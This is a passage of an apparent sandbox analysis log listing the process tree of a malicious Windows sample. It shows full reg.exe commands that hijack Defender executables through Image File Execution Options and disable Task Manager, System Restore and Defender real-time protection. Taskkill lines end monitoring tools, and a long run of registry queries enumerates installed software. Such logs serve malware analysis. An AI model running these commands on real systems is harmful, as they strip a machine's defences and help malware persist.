C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1584
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1816
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:1868
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1872
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:1880
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:1964
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:1996
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1936
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1672
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:1528
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1716
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1828
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1240
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1072
-
C:\Windows\System32\Wbem\WMIC.exewmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List3⤵PID:1484
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1360
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1144
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1544
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1968
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1988
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:616
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:540
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:2068
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2168
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2232
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2288
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2336
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2392
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:2448
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:2480
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2516
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:2528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:2544
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2556
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:2568
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:2580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2596
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:2608
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:2620
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:2648
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:2660
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2676
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:2688
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:2704
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2716
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:2732
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:2744
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2760
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:2772
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:2788
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2800
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:2812
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:2832
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2864
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:2892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:2904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2916
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:2928
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:2948
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2960
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:2972
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:2984
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2996
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:3016
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:3032
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3044
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:3060
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:1716
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:344
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:2256
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:976
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1980
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:2016
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:2044
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:568
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:2368
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:276
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1052
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:2344
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:1604
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1492
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:2428
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:2004
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1984
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:1544
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:828
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:108
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:1584
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:1672
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1972
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:1572
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:872
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1828
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:1988
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:528
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1960
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:2540
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:560
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1076
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:2528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:792
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2572
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:2584
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:2592
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:684
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:2056
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:540
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2608
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:2248
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:2088
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2216
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:2604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:2652
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2664
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:2660
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:2308
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2280
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:2168
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:2692
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2684
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:2724
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:2136
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2756
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:2272
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:2232
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2732
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:2744
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:2776
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2768
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:2796
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:2820
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:2860
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:2292
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2288
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:2900
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:2104
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2908
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:2924
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:1028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2936
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:2952
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:2980
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2988
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:3012
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:2992
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:3068
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:3024
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3056
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:1196
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:3052
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:2304
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:1224
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:2372
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:2360
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2336
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:2884
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:2396
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2880
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:2784
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:2728
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2416
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:2460
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:2940
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2848
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:2504
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:1812
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:656
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:2384
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1092
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1604
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1844
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:1920
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2400
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1544
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:828
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1144
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:2440
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:1968
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1768
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:704
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:1916
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2496
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:1988
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:528
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2064
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:388
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:1660
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:1976
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1380
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3008
-
